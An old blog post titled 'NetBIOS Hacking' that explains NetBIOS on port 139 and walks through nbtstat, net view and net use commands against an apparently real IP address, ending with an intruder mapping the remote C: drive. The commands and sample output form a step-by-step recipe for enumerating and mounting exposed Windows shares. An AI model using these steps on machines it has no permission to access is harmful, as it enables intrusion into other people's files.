NetBIOS Hacking Posted by R@hUl | at 8:59 AM

NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an
Application Programming Interface (API) for client
software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers
on a network, which includes computer name, username,
domain, group, and many others.....!

The NBTSTAT Command

NBTSTAT is the command for manually interact with
NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command
and their usage can be viewed.
At the command prompt type-

C:\Windows>nbtstat

Sample NBTSTAT Response

C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table

Name Type Status
----------------------------------------------
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1e> GROUP Registered

MAC Address = 86-95-55-50-00-00


An intruder could use the output from an nbtstat
against your machines to begin gathering information
about them.

"<03> in above table is nothing but the username of

that system."

The next step for an intruder would be to try and list
the open shares on the given computer, using the net
view command.
Here is an example of the Net View command-

C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174

Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\

The command was completed successfully.


This information would give the intruder a list of
shares which he would then use in conjunction with the
Net Use command, a command used to enable a computer to
map a share to it’s local drive, below is an example of
how an intruder would map the C Share to
a local G: drive, which he could then browse...!

C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>